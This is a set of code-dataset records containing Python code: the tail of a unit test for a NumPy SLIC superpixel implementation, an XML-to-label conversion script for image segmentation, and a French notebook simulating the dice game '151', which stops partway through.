np.empty((len(clusters), 4 * S, 4 * S, 5), dtype='float32') # [x,y,l,a,b] per pixel\n test_slices_d = np.empty((len(clusters), 4 * S, 4 * S), dtype='float32')\n test_slices_mask = np.empty((len(clusters), 4 * S, 4 * S), dtype='bool') * False\n test_final_labels = np.ones(D.shape) * -1\n\n for i, cluster in enumerate(clusters):\n # print(\"this is cluster \", i)\n for h in range(cluster.h - 2 * S, cluster.h + 2 * S):\n for w in range(cluster.w - 2 * S, cluster.w + 2 * S):\n L, A, B = data[h][w]\n h_ = h - (cluster.h - 2 * S)\n w_ = w - (cluster.w - 2 * S)\n test_slices[i, h_, w_] = h, w, L, A, B\n Dc = math.sqrt(\n math.pow(L - cluster.l, 2) +\n math.pow(A - cluster.a, 2) +\n math.pow(B - cluster.b, 2))\n Ds = math.sqrt(\n math.pow(h - cluster.h, 2) +\n math.pow(w - cluster.w, 2))\n dist = math.sqrt(math.pow(Dc / M, 2) + math.pow(Ds / S, 2))\n D[h, w] = dist\n test_slices_d[i, h_, w_] = dist\n if D[h, w] < dis[h][w]:\n if (h, w) not in label:\n label[(h, w)] = cluster\n else:\n label[(h, w)].pixels.remove((h, w))\n label[(h, w)] = cluster\n cluster.pixels.append((h, w))\n # here\n test_slices_mask[i, h_, w_] = True\n test_final_labels[h, w] = int(cluster.no)\n dis[h][w] = D[h, w]\n\n new_clusters = copy.deepcopy(clusters)\n clusters_pos = np.empty((len(new_clusters), 2), dtype=float)\n for i, cluster in enumerate(new_clusters):\n sum_h = sum_w = number = 0\n for p in cluster.pixels:\n sum_h += p[0]\n sum_w += p[1]\n number += 1\n _h = int(sum_h / number)\n _w = int(sum_w / number)\n cluster.update(_h, _w, data[_h][_w][0], data[_h][_w][1], data[_h][_w][2])\n clusters_pos[i] = np.array([int(_h), int(_w)])\n\n def get_slices(self, clusters, S, data):\n # mat = np.ones((len(self.clusters), 4 * self.S, 4 * self.S, 5), dtype='float32')\n # for i, cluster in enumerate(self.clusters):\n # for h in range(0, 4 * self.S):\n # for w in range(0, 4 * self.S):\n # h_ = h + (cluster.h - 2 * self.S)\n # w_ = w + (cluster.w - 2 * self.S)\n # L, A, B = self.data[h_][w_]\n # mat[i, h, w] = [h_, w_, L, A, B]\n p = np.empty((len(clusters), 2))\n for i, cluster in enumerate(clusters):\n p[i] = [cluster.h, cluster.w]\n\n mat2 = np.ones((len(clusters), 4 * S, 4 * S, 5), dtype='float32')\n xv, yv = np.meshgrid(np.arange(0, 4 * S), np.arange(0, 4 * S), indexing='ij')\n for i in range(len(clusters)):\n temp_x = xv + p[i, 0] - 2 * S\n temp_y = yv + p[i, 1] - 2 * S\n temp_x = temp_x.astype(int)\n temp_y = temp_y.astype(int)\n mat2[i, :, :, 0] = temp_x\n mat2[i, :, :, 1] = temp_y\n mat2[i, :, :, 2:] = data[temp_x, temp_y]\n return mat2\n\n def get_slices_d(self, clusters, S, M, data):\n slices = self.get_slices(clusters, S, data)\n # mat = np.empty((len(self.clusters), 4 * self.S, 4 * self.S), dtype='float32')\n # matDc = np.empty((len(self.clusters), 4 * self.S, 4 * self.S), dtype='float32')\n # matDs = np.empty((len(self.clusters), 4 * self.S, 4 * self.S), dtype='float32')\n # for i, cluster in enumerate(self.clusters):\n # for h in range(0, 4 * self.S):\n # for w in range(0, 4 * self.S):\n # h_, w_, L, A, B = slices[i, h, w]\n # Dc = math.sqrt(\n # math.pow(cluster.l - L, 2) +\n # math.pow(cluster.a - A, 2) +\n # math.pow(cluster.b - B, 2))\n # matDc[i,h,w] = Dc\n # Ds = math.sqrt(\n # math.pow(cluster.h - h_, 2) +\n # math.pow(cluster.w - w_, 2))\n # matDs[i,h,w] = Ds\n # mat[i, h, w] = math.sqrt(math.pow(Dc / self.M, 2) + math.pow(Ds / self.S, 2))\n\n cluster_pos = np.empty((len(clusters), 2))\n for i, cluster in enumerate(clusters):\n cluster_pos[i] = [cluster.h, cluster.w]\n\n clusters = np.empty((len(clusters), 5), dtype='float32')\n clusters[:, 0] = cluster_pos[:, 0]\n clusters[:, 1] = cluster_pos[:, 1]\n cluster_pos = cluster_pos.astype(int)\n clusters[:, 2:] = data[cluster_pos[:, 0], cluster_pos[:, 1]]\n\n temp = copy.deepcopy(slices)\n temp = temp.astype(float)\n slices_dist = np.empty((len(clusters), 4 * S, 4 * S), dtype='float32')\n for i, cluster in enumerate(clusters):\n Ds = np.linalg.norm((temp[i, :, :, 0:2] - clusters[i, 0:2]), axis=2) / S\n Dc = np.linalg.norm((temp[i, :, :, 2:] - clusters[i, 2:]), axis=2) / M\n slices_dist[i] = np.power(np.power(Ds, 2) + np.power(Dc, 2), 0.5)\n\n return slices_dist\n\n def get_slices_mask(self, clusters, S, M, data, image_height, image_width, border):\n slices_d = self.get_slices_d(clusters, S, M, data)\n mat = np.ones((len(clusters), 4 * S, 4 * S), dtype=bool) * False\n temp_dis = np.full((image_height, image_width), -1.0)\n temp_dis[border:image_height - border, border:image_width - border] = np.inf\n # temp_D = np.full((self.image_height, self.image_width), -1.0)\n # temp_D[self.border:self.image_height - self.border, self.border:self.image_width - self.border] = np.inf\n # for i, cluster in enumerate(self.clusters):\n # temp_D = slices_d[i]\n # for h in range(0, 4 * self.S):\n # for w in range(0, 4 * self.S):\n # h_ = h + (cluster.h - 2 * self.S)\n # w_ = w + (cluster.w - 2 * self.S)\n # if temp_D[h, w] < temp_dis[h_][w_]:\n # mat[i, h, w] = True\n # temp_dis[h_][w_] = temp_D[h, w]\n\n\n temp_mat = np.ones((len(clusters), 4 * S, 4 * S), dtype=bool) * False\n temp_dis2 = np.full((image_height, image_width), -1.0)\n temp_dis2[border:image_height - border, border:image_width - border] = np.inf\n dis_slices = np.empty((len(clusters), 4 * S, 4 * S))\n\n cluster_pos = np.empty((len(clusters), 2))\n for i, cluster in enumerate(clusters):\n cluster_pos[i] = [cluster.h, cluster.w]\n\n xv, yv = np.meshgrid(np.arange(0, 4 * S), np.arange(0, 4 * S), indexing='ij')\n\n for i in range(len(clusters)):\n temp_x = xv + cluster_pos[i, 0] - 2 * S\n temp_y = yv + cluster_pos[i, 1] - 2 * S\n temp_x = temp_x.astype(int)\n temp_y = temp_y.astype(int)\n mask = slices_d[i] < temp_dis2[temp_x, temp_y]\n mat[i] = mask\n x0 = int(cluster_pos[i, 0] - 2 * S)\n x1 = int(cluster_pos[i, 0] + 2 * S)\n y0 = int(cluster_pos[i, 1] - 2 * S)\n y1 = int(cluster_pos[i, 1] + 2 * S)\n temp_dis2[x0:x1, y0:y1][mask] = slices_d[i][mask]\n #\n #\n # for i, cluster in enumerate(self.clusters):\n # mask = slices_d[i] < dis_slices[i]\n # mat[i] = mask\n # slices_d[i][mask]\n # for h in range(0, 4 * self.S):\n # for w in range(0, 4 * self.S):\n # h_ = h + (cluster.h - 2 * self.S)\n # w_ = w + (cluster.w - 2 * self.S)\n # if temp_D[h, w] < temp_dis[h_][w_]:\n # mat[i, h, w] = True\n # temp_dis[h_][w_] = temp_D[h, w]\n\n return mat, temp_dis2\n\n def get_final_labels(self, clusters, S, M, data, image_height, image_width, border, D):\n slices_mask, final_dis = self.get_slices_mask(clusters, S, M, data, image_height, image_width, border)\n temp = np.ones(D.shape) * -1\n mask2 = np.full(D.shape, False, dtype=bool)\n for i, cluster in enumerate(clusters):\n mask = slices_mask[i]\n mask2[cluster.h - 2 * S:cluster.h + 2 * S, cluster.w - 2 * S:cluster.w + 2 * S] = mask\n temp[mask2] = int(i)\n # Reset\n mask2[cluster.h - 2 * S:cluster.h + 2 * S, cluster.w - 2 * S:cluster.w + 2 * S] = False\n return temp\n\n def get_new_clusters(self, labels, clusters):\n # labels = self.get_final_labels(clusters, S, M, data, image_height, image_width, border, D)\n # temp = np.empty((len(self.new_clusters), 2), dtype=float)\n temp = np.empty((len(clusters), 2), dtype=float)\n # sub_labels = labels[self.border:self.image_height - self.border, self.border:self.image_width - self.border]\n # for i in range(len(self.new_clusters)):\n for i in range(len(clusters)):\n mask = labels == i\n center_of_mass = np.mean(np.where(mask), axis=1, dtype=int)\n temp[i, :] = center_of_mass\n return temp\n\n def test_slices_fct(self):\n np.testing.assert_allclose(self.test_slices, self.get_slices(self.clusters, self.S, self.data))\n\n def test_slices_d_fct(self):\n np.testing.assert_allclose(self.test_slices_d, self.get_slices_d(self.clusters, self.S, self.M, self.data), rtol=1e-6, atol=1e-6)\n\n def test_slices_mask_fct(self):\n mat2, _ = self.get_slices_mask(self.clusters, self.S, self.M, self.data, self.image_height, self.image_width, self.border)\n self.assertTrue((self.test_slices_mask == mat2).all())\n\n def test_dis_fct(self):\n mat = self.dis\n _, mat2 = self.get_slices_mask(self.clusters, self.S, self.M, self.data, self.image_height, self.image_width, self.border)\n np.testing.assert_allclose(mat, mat2, rtol=1e-6, atol=1e-6)\n\n def test_final_labels_fct(self):\n mat = self.test_final_labels\n mat2 = self.get_final_labels(self.clusters, self.S, self.M, self.data, self.image_height, self.image_width, self.border, self.D)\n np.testing.assert_allclose(mat, mat2, rtol=1e-6, atol=1e-6)\n\n def test_new_clusters_fct(self):\n pos = self.clusters_pos\n labels = self.get_final_labels(self.clusters, self.S, self.M, self.data, self.image_height, self.image_width, self.border, self.D)\n pos2 = self.get_new_clusters(labels, self.clusters)\n np.testing.assert_allclose(pos, pos2, rtol=1e-6, atol=1e-6)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"szat/Numpy-SLIC","sub_path":"unit_test.py","file_name":"unit_test.py","file_ext":"py","file_size_in_byte":13723,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"2068237411","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Mar 20 18:08:48 2017\n\n@author: andrew\n\nThis script could read polygon coordiante from a xml file and \ndraw those ones and fill according to palette.\nDraw result will save as 8-bits png with palette format.\nIn order to observe the result of drawing, draw_on_image method will\nblend result on orignal image.\nIf some part will draw wiht same pattern on every image, we could set\nmask xml file to do that.\nWe could call script by terminal and assign some options.\n\"\"\"\n\nimport os\nimport os.path as op\nimport shutil\nimport argparse\nimport assist_util as au\nimport xml_write as xw\nimport xml_read as xr\nimport draw_mark as dm\n \ndef init_generate(args):\n xml_dir = args.dir\n \n result_dir = op.join(os.getcwd(),'result')\n if not op.exists(result_dir):\n os.mkdir(result_dir)\n \n path_fraction = xml_dir.split('/')\n if path_fraction[-1] == '':\n orignal_dir = path_fraction[-2]\n else:\n orignal_dir = path_fraction[-1]\n \n label_dir = op.join(result_dir, (orignal_dir + '_label'))\n if op.exists(label_dir):\n shutil.rmtree(label_dir)\n os.makedirs(label_dir)\n else:\n os.makedirs(label_dir)\n \n dirlist = os.listdir(xml_dir) \n files = [x for x in dirlist if op.isfile(op.join(xml_dir,x))]\n assign_palette = au.create_png_palette()\n \n mask_file = args.mask\n if args.mask:\n mask = (xr.xml_decode_polygon(mask_file, args)[0][0][0]).pts \n else: \n mask = None\n \n if args.reference: \n str_index = args.reference\n try:\n label_index = str_index.split(',')\n label_ref = [int(x) for x in label_index]\n label_ref.append(int(255))\n except ValueError as e :\n print('Specific an abnormal class index: ', e )\n exit()\n else:\n label_ref = None\n \n if args.images:\n if not op.exists(args.images):\n raise IOError('No such directory contained images named: ', args.images)\n else:\n image_list = os.listdir(args.images)\n images = [x for x in image_list if op.isfile(op.join(args.images,x))] \n if len(images): \n check_dir = op.join(result_dir, (orignal_dir + '_check')) \n if op.exists(check_dir):\n shutil.rmtree(check_dir)\n os.makedirs(check_dir)\n else:\n os.makedirs(check_dir)\n #Copy labeled images to new directory\n extract_dir = op.join(result_dir, (orignal_dir + '_extract'))\n \n if op.exists(extract_dir):\n shutil.rmtree(extract_dir)\n os.makedirs(extract_dir)\n else:\n os.makedirs(extract_dir)\n else:\n print('Image directory is empty!!!!') \n else:\n check_dir = None\n extract_dir = None\n images = [] \n \n return (xml_dir, label_dir, files, assign_palette, mask,\n args.images, check_dir, extract_dir, images, label_ref)\n\ndef label_generate(args):\n\n (xml_dir, label_dir, labels, assign_palette, mask, \n image_path, check_dir, extract_dir, images, label_ref) = init_generate(args)\n \n bar_worker = au.process_bar(num_items= len(labels))\n \n if image_path == None:\n for f in labels:\n xml_file_name = op.join(xml_dir, f)\n \n object_dict, width, height = xr.xml_decode_polygon(xml_file_name, args, label_ref)\n label_perfix = op.splitext(f)[0] \n bar_worker.update()\n if object_dict:\n dm.create_label(label_perfix, label_dir, object_dict, \n width, height, assign_palette, args, mask_pts = mask)\n else: \n num_image = len(images)\n if num_image:\n images_perfix_list = [op.splitext(x)[0] for x in images]\n image_extension = op.splitext(images[0])[1]\n \n for f in labels:\n xml_file_name = op.join(xml_dir, f) \n object_dict, width, height = xr.xml_decode_polygon(xml_file_name, args, label_ref)\n label_perfix = op.splitext(f)[0] \n bar_worker.update()\n if object_dict:\n label = dm.create_label(label_perfix, label_dir, object_dict, \n width, height, assign_palette, args, mask_pts = mask) \n \n if num_image and (label_perfix in images_perfix_list):\n dm.draw_on_image(label_perfix + image_extension, image_path,\n check_dir, label, object_dict, args, mask)\n au.copy_image(extract_dir, image_path, label_perfix + image_extension, args)\n print('\\n')\n\n\ndef bbox_generate(args):\n (xml_dir, label_dir, labels, assign_palette, mask, \n image_path, check_dir, extract_dir, images, label_ref) = init_generate(args)\n \n bar_worker = au.process_bar(num_items= len(labels))\n \n # Define a inner function for different data source\n if args.bndbox == 1:\n # From polygon\n def xml_decode(xml_file_name, args):\n object_dict, width, height = xr.xml_decode_polygon(xml_file_name, args)\n bbox_list = xr.extract_bbox(height, width, object_dict)\n return bbox_list, height, width, 0, width, width\n elif args.bndbox == 2:\n # From bounding box\n def xml_decode(xml_file_name, args):\n bbox_list, width, height, lborder, rborder, nwidth = xr.xml_decode_bbox(xml_file_name, args)\n return bbox_list, width, height, lborder, rborder, nwidth\n else:\n raise ValueError('Specify a invalid method type: args - ', args.bndbox)\n \n if image_path:\n num_image = len(images)\n if num_image:\n images_perfix_list = [op.splitext(x)[0] for x in images]\n image_extension = op.splitext(images[0])[1] \n for f in labels:\n xml_file_name = op.join(xml_dir, f) \n bbox_list, width, height, lborder, rborder, nwidth = xml_decode(xml_file_name, args)\n bar_worker.update()\n if bbox_list:\n \n label_perfix = op.splitext(f)[0] \n \n if num_image and (label_perfix in images_perfix_list): \n dm.draw_poly2bbox(label_perfix + image_extension, image_path, check_dir, bbox_list, \n args, nwidth, lborder)\n xw.create_bbox(bbox_list, label_dir, height, nwidth, label_perfix, args.size)\n au.copy_image(extract_dir, image_path, label_perfix + image_extension, args,\n nwidth, lborder)\n else:\n raise IOError('Orignal image path must be provided!')\n \n print('\\n') \n \nif __name__ == '__main__':\n \n parser = argparse.ArgumentParser( \n description= '''Convert xml label to image label for image segmentation\n ''',\n formatter_class=argparse.ArgumentDefaultsHelpFormatter)\n \n parser.add_argument('-d','--dir', type = str, default = None, required = True,\n help = 'The directory that contain xml label files')\n parser.add_argument('-m','--mask', type = str, default = None,\n help = 'The mask that will be used onto every label')\n parser.add_argument('-i','--images', type = str, default = None,\n help = '''The image directory, if this argument is set ,\n label will show on orignal image''')\n parser.add_argument('-t', '--transparent', type = int, default = 1,\n help = 'Whether draw label on orignal image transparently')\n parser.add_argument('-a', '--alpha', type = float, default = 0.4,\n help = 'Transparent ratio')\n parser.add_argument('-o', '--omit', type = int , default = 1,\n help = 'Whether treat the occluded object as ignore')\n parser.add_argument('-r', '--reference', type = str, default = None,\n help = '''Specific the which label will be used. \n Assign class index and sperate by comma''') \n parser.add_argument('-l', '--linewidth', type = int, default = 2,\n help = 'Ignore line width between different objects')\n parser.add_argument('-s', '--size', type = float, default = 1.0,\n help = 'Size ratio of orignal images and labels')\n parser.add_argument('-b', '--bndbox', type = int, default = 0,\n help = 'Wether to generate bounding box format label')\n parser.add_argument('-p', '--palette', type = int, default = 0,\n help = '0 object palette, 1 component palette')\n parser.add_argument('-f', '--fov', type = int, default = 128,\n help = 'Keep the scope of picture by FOV')\n parser.add_argument('-c', '--crop', type = int, default= 0,\n help = 'crop offset from top')\n\n args = parser.parse_args()\n \n if args.bndbox:\n bbox_generate(args)\n else:\n label_generate(args)\n","repo_name":"T800GHB/Python_Basic","sub_path":"reference_code/image_label_tools/label_generate/xml2lable.py","file_name":"xml2lable.py","file_ext":"py","file_size_in_byte":9425,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"813236741","text":"\n# coding: utf-8\n\n# # Simulons le jeu de *151* avec Python !\n# \n# ## But :\n# - Simuler numériquement le jeu de 151, qui est une variante à 3 dés du jeu appelé [5000](https://fr.wikipedia.org/wiki/5000),\n# - Afin de trouver une stratégie *optimale*.\n# \n# ## Comment ?\n# - On va simuler des millions de parties (cf. [méthodes de Monte-Carlo](https://fr.wikipedia.org/wiki/Méthodes_de_Monte-Carlo)),\n# - Afin de comparer différentes stratégies (aléatoires, s'arrêter au premier coup, s'arrêter après 3 coups, etc),\n# - On les compare en fonction de leur gain *moyen*,\n# - La meilleur stratégie sera celle qui apporte un gain moyen le plus élevé.\n# \n# ## Résultats ?\n# → Lien vers les résultats obtenus.\n\n# ----\n# \n# ## Plans\n# 1. fonctions pour simuler un tirage (3 dés),\n# 2. puis simuler une une partie (affrontant deux stratégies, face à un total), plein de parties (total aléatoire),\n# 3. implémenter différentes stratégies,\n# 4. les comparer, faire des graphiques, et tirer des conclusions statistiquement valides (avec moyennes *et* écart-types).\n\n# ----\n# \n# ## 1. Simuler un tirage et une partie\n\n# ### 1.1. Simuler un tirage\n\n# Dépendances :\n\n# In[1]:\n\n\nimport numpy as np\nimport numpy.random as rn\nrn.seed(0) # Pour obtenir les mêmes résultats\nimport matplotlib.pyplot as plt\n\nimport seaborn as sns\nsns.set(context=\"notebook\", style=\"darkgrid\", palette=\"hls\", font=\"sans-serif\", font_scale=1.4)\n\n\n# Première fonction : pour tirer trois dés, à 6 faces, indépendants.\n\n# In[2]:\n\n\ndef tirage(nb=1):\n \"\"\" Renvoie un numpy array de taille (3,) si nb == 1, sinon (nb, 3).\"\"\"\n if nb == 1:\n return rn.randint(1, 7, 3)\n else:\n return rn.randint(1, 7, (nb, 3))\n\n\n# Testons là :\n\n# In[3]:\n\n\ntirage()\n\n\n# In[4]:\n\n\ntirage(10)\n\n\n# ### 1.2. Points d'un tirage\n# Le jeu de *151* associe les points suivants, multiples de 50, aux tirages de 3 dés :\n# \n# - 200 pour un brelan de 2, 300 pour un brelan de 3, .., 600 pour un brelan de 6, 700 pour un brelan de 1,\n# - 100 pour chaque 1, si ce n'est pas un brelan,\n# - 50 pour chaque 5, si ce n'est pas un brelan.\n\n# In[5]:\n\n\nCOMPTE_SUITE = False # Savoir si on implémente aussi la variante avec les suites\n\ndef _points(valeurs, compte_suite=COMPTE_SUITE):\n if valeurs[0] == valeurs[1] == valeurs[2]: # Un brelan !\n if valeurs[0] == 1:\n return 700\n else:\n return 100 * valeurs[0]\n else: # Pas de brelan\n # Code pour compter les suites :\n bonus_suite = compte_suite and set(np.diff(np.sort(valeurs))) == {1}\n return 100 * (np.sum(valeurs == 1) + bonus_suite) + 50 * np.sum(valeurs == 5)\n\n\ndef points(valeurs, compte_suite=COMPTE_SUITE):\n \"\"\" Calcule les points du tirage correspondant à valeurs.\n \n - si valeurs est de taille (3,), renvoie un seul entier,\n - si valeurs est de taille (nb, 3), renvoie un tableau de points.\n \"\"\"\n if len(np.shape(valeurs)) > 1:\n return np.array([_points(valeurs[i,:], compte_suite) for i in range(np.shape(valeurs)[0])])\n else:\n return _points(valeurs, compte_suite)\n\n\n# #### 1.2.1. Un seul tirage\n\n# Testons ces fonctions :\n\n# In[6]:\n\n\nvaleurs = tirage()\nprint(\"La valeur {} donne {:>5} points.\".format(valeurs, points(valeurs)))\n\n\n# In[7]:\n\n\nfor _ in range(20):\n valeurs = tirage()\n print(\"- La valeur {} donne {:>5} points.\".format(valeurs, points(valeurs)))\n\n\n# Testons quelques valeurs particulières :\n\n# - Les brelans :\n\n# In[8]:\n\n\nfor valeur in range(1, 7):\n valeurs = valeur * np.ones(3, dtype=int)\n print(\"- La valeur {} donne {:>5} points.\".format(valeurs, points(valeurs)))\n\n\n# - Les 1 :\n\n# In[9]:\n\n\nfor valeurs in [np.array([2, 3, 6]), np.array([1, 3, 6]), np.array([1, 1, 6])]:\n print(\"- La valeur {} donne {:>5} points.\".format(valeurs, points(valeurs)))\n\n\n# - Les 5 :\n\n# In[10]:\n\n\nfor valeurs in [np.array([2, 3, 6]), np.array([5, 3, 6]), np.array([5, 5, 6])]:\n print(\"- La valeur {} donne {:>5} points.\".format(valeurs, points(valeurs)))\n\n\n# → C'est bon, *tout* marche !\n# \n# *Note* : certaines variants du 151 accordent une valeur supplémentaire aux *suites* (non ordonnées) : [1, 2, 3] vaut 200, [2, 3, 4] vaut 100, et [3, 4, 5] et [4, 5, 6] vaut 150.\n# Ce n'est pas difficile à intégrer dans notre fonction `points`.\n\n# - Testons quand même les suites :\n\n# In[11]:\n\n\nfor valeurs in [np.array([1, 2, 3]), np.array([2, 3, 4]), np.array([3, 4, 5]), np.array([4, 5, 6])]:\n print(\"- La valeur {} donne {:>5} points.\".format(valeurs, points(valeurs)))\n\n\n# #### 1.2.2. Plusieurs tirages\n\n# Testons ces fonctions :\n\n# In[12]:\n\n\nvaleurs = tirage(10)\nprint(valeurs)\nprint(points(valeurs))\n\n\n# ----\n# \n# #### 1.2.3. Moyenne d'un tirage, et quelques figures\n\n# On peut faire quelques tests statistiques dès maintenant :\n\n# - Points moyens d'un tirage :\n\n# In[13]:\n\n\ndef moyenneTirage(nb=1000):\n return np.mean(points(tirage(nb), False))\n\ndef moyenneTirage_avecSuite(nb=1000):\n return np.mean(points(tirage(nb), True))\n\nfor p in range(2, 7):\n nb = 10 ** p\n print(\"- Pour {:>7} tirages, les tirages valent en moyenne {:>4} points.\".format(nb, moyenneTirage(nb)))\n print(\"- Pour {:>7} tirages, les tirages valent en moyenne {:>4} points si on compte aussi les suites.\".format(nb, moyenneTirage_avecSuite(nb)))\n\n\n# Ça semble converger vers 85 : en moyenne, un tirage vaut entre 50 et 100 points, plutôt du côté des 100.\n# Et si on compte les suites, la valeur moyenne d'un tirage vaut plutôt 96 points (ça augmente comme prévu, mais ça augmente peu).\n\n# - Moyenne et écart type :\n\n# In[14]:\n\n\ndef moyenneStdTirage(nb=1000):\n pts = points(tirage(nb))\n return np.mean(pts), np.std(pts)\n\nfor p in range(2, 7):\n nb = 10 ** p\n m, s = moyenneStdTirage(nb)\n print(\"- Pour {:>7} tirages, les tirages valent en moyenne {:6.2f} +- {:>6.2f} points.\".format(nb, m, s))\n\n\n# - Quelques courbes :\n\n# In[15]:\n\n\ndef plotPoints(nb=2000):\n pts = np.sort(points(tirage(nb)))\n m = np.mean(pts)\n plt.figure()\n plt.plot(pts, 'ro')\n plt.title(\"Valeurs de {} tirages. Moyenne = {:.2f}\".format(nb, m))\n plt.show()\n\n\n# In[16]:\n\n\nplotPoints()\n\n\n# In[17]:\n\n\nplotPoints(10**5)\n\n\n# In[18]:\n\n\nplotPoints(10**6)\n\n\n# - On peut calculer la probabilité d'avoir un tirage valant 0 points :\n\n# In[19]:\n\n\ndef probaPoints(nb=1000, pt=0, compte_suite=COMPTE_SUITE):\n pts = points(tirage(nb), compte_suite)\n return np.sum(pts == pt) / float(nb)\n\n\n# In[20]:\n\n\nfor p in range(2, 7):\n nb = 10 ** p\n prob = probaPoints(nb, compte_suite=False)\n print(\"- Pour {:>7} tirages, il y a une probabilité {:7.2%} d'avoir 0 point.\".format(nb, prob))\n prob = probaPoints(nb, compte_suite=True)\n print(\"- Pour {:>7} tirages, il y a une probabilité {:7.2%} d'avoir 0 point si on compte les suites.\".format(nb, prob))\n\n\n# Donc un tirage apporte 85 points en moyenne, mais il y a environ 28% de chance qu'un tirage rate.\n# \n# Si on compte les suites, un tirage apporte 97 points en moyenne, mais il y a environ 25% de chance qu'un tirage rate.\n\n# - On peut faire le même genre de calcul pour les différentes valeurs de points possibles :\n\n# In[21]:\n\n\n# valeursPossibles = list(set(points(tirage(10000))))\nvaleursPossibles = [0, 50, 100, 150, 200, 250, 300, 400, 500, 600, 700]\n\n\n# In[22]:\n\n\nfor p in range(4, 7):\n nb = 10 ** p\n tirages = tirage(nb)\n pts = points(tirages, False)\n pts_s = points(tirages, True)\n print(\"\\n- Pour {:>7} tirages :\".format(nb))\n for pt in valeursPossibles:\n prob = np.sum(pts == pt) / float(nb)\n print(\" - Il y a une probabilité {:7.2%} d'avoir {:3} point{}.\".format(prob, pt, 's' if pt > 0 else ''))\n prob = np.sum(pts_s == pt) / float(nb)\n print(\" - Il y a une probabilité {:7.2%} d'avoir {:3} point{} si on compte les suites.\".format(prob, pt, 's' if pt > 0 else ''))\n\n\n# On devrait faire des histogrammes, mais j'ai la flemme...\n# \n# Ces quelques expériences montrent qu'on a :\n# - une chance d'environ 2.5% d'avoir plus de 300 points (par un brelan),\n# - une chance d'environ 9% d'avoir entre 200 et 300 points,\n# - une chance d'environ 11% d'avoir 150 points,\n# - une chance d'environ 27% d'avoir 100 points,\n# - une chance d'environ 22% d'avoir 50 points,\n# - une chance d'environ 28% d'avoir 0 point.\n# \n# Autant de chance d'avoir 100 points que 0 ? Et oui !\n# \n# La variante comptant les suites augmente la chance d'avoir 200 points (de 7.5% à 10%), d'avoir 150 points (de 11% à 16%), et diminue la chance d'avoir 0 point, mais ne change pas vraiment le reste du jeu.\n\n# ----\n# \n# ### 1.3. Simuler des parties\n# #### 1.3.1. Simuler une partie\n# On va d'abord écrire une fonction qui prend deux joeurs, un total, et simule la partie, puis donne l'indice (0 ou 1) du joueur qui gagne.\n\n# In[13]:\n\n\nDEBUG = False # Par défaut, on n'affiche rien\n\n\n# In[14]:\n\n\ndef unJeu(joueur, compte, total, debug=DEBUG):\n accu = 0\n if debug: print(\" - Le joueur {.__name__} commence à jouer, son compte est {} et le total est {} ...\".format(joueur, compte, total))\n t = tirage()\n nbLance = 1\n if points(t) == 0:\n if debug: print(\" - Hoho, ce tirage {} vallait 0 points, le joueur doit arrêter.\".format(t))\n return 0, nbLance\n if debug: print(\" - Le joueur a obtenu {} ...\".format(t))\n while compte + accu <= total and joueur(compte, accu, t, total):\n accu += points(t)\n t = tirage()\n nbLance += 1\n if debug: print(\" - Le joueur a décidé de rejouer, accumulant {} points, et a ré-obtenu {} ...\".format(accu, t))\n if points(t) == 0:\n if debug: print(\" - Hoho, ce tirage {} vallait 0 points, le joueur doit arrêter.\".format(t))\n break\n accu += points(t)\n if compte + accu > total:\n if debug: print(\" - Le joueur a dépassé le total : impossible de marquer ! compte = {} + accu = {} > total = {} !\".format(compte, accu, total))\n return 0, nbLance\n else:\n if accu > 0:\n if debug: print(\" - Le joueur peut marquer les {} points accumulés en {} lancés !\".format(accu, nbLance))\n return accu, nbLance\n\n\ndef unePartie(joueurs, total=1000, debug=DEBUG, i0=0):\n assert len(joueurs) == 2, \"Erreur, seulement 2 joueurs sont acceptés !\"\n comptes = [0, 0]\n nbCoups = [0, 0]\n nbLances = [0, 0]\n scores = [[0], [0]]\n if debug: print(\"- Le joueur #{} va commencer ...\".format(i0))\n i = i0\n while max(comptes) != total: # Tant qu'aucun joueur n'a gagné\n nbCoups[i] += 1\n if debug: print(\"- C'est au joueur #{} ({.__name__}) de jouer, son compte est {} et le total est {} ...\".format(i, joueurs[i], comptes[i], total))\n accu, nbLance = unJeu(joueurs[i], comptes[i], total, debug)\n nbLances[i] += nbLance\n if accu > 0:\n comptes[i] += accu\n scores[i].append(comptes[i]) # Historique\n if comptes[i] == total:\n if debug: print(\"- Le joueur #{} ({.__name__}) a gagné en {} coups et {} lancés de dés !\".format(i, joueurs[i], nbCoups[i], nbLances[i]))\n if debug: print(\"- Le joueur #{} ({.__name__}) a perdu, avec un score de {}, après {} coups et {} lancés de dés !\".format(i^1, joueurs[i^1], comptes[i^1], nbCoups[i^1], nbLances[i^1]))\n return i, scores\n i ^= 1 # 0 → 1, 1 → 0 (ou exclusif)\n\n# Note : on pourrait implémenter une partie à plus de 2 joueurs\n\n\n# ----\n# #### 1.3.2. Des stratégies\n# \n# On doit définir des stratégies, sous la forme de fonctions `joueur(compte, accu, t, total)`, qui renvoie `True` si elle doit continuer à jouer, ou `False` si elle doit marquer.\n# \n# D'abord, deux stratégies un peu stupides :\n\n# In[15]:\n\n\ndef unCoup(compte, accu, t, total):\n \"\"\" Stratégie qui marque toujours au premier coup, peu importe le 1er tirage obtenu.\"\"\"\n return False # Marque toujours !\n\ndef jusquauBout(compte, accu, t, total):\n \"\"\" Stratégie qui ne marque que si elle peut gagner exactement .\"\"\"\n if compte + accu + points(t) >= total:\n return False # Marque si elle peut gagner\n else:\n return True # Continue à jouer\n\n\n# Une autre stratégie, qui marche seulement si elle peut marquer plus de X points (100, 150 etc).\n# C'est la version plus \"gourmande\" de `unCoup`, qui marque si elle a plus de 50 points.\n\n# In[16]:\n\n\ndef auMoinsX(X):\n def joueur(compte, accu, t, total):\n \"\"\" Stratégie qui marque si elle a eu plus de {} points.\"\"\".format(X)\n if accu + points(t) >= X:\n return False # Marque si elle a obtenu plus de X points\n elif compte + accu + points(t) == total:\n return False # Marque si elle peut gagner\n elif total - compte < X:\n # S'il reste peu de points, marque toujours\n # (sinon la stratégie d'accumuler plus de X points ne marche plus)\n return False\n else:\n return True # Continue de jouer, essaie d'obtenir X points\n joueur.__name__ = \"auMoins{}\".format(X) # Triche sur le nom\n return joueur\n\nauMoins50 = auMoinsX(50) # == unCoup, en fait\nauMoins100 = auMoinsX(100)\nauMoins150 = auMoinsX(150)\nauMoins200 = auMoinsX(200) # Commence à devenir très 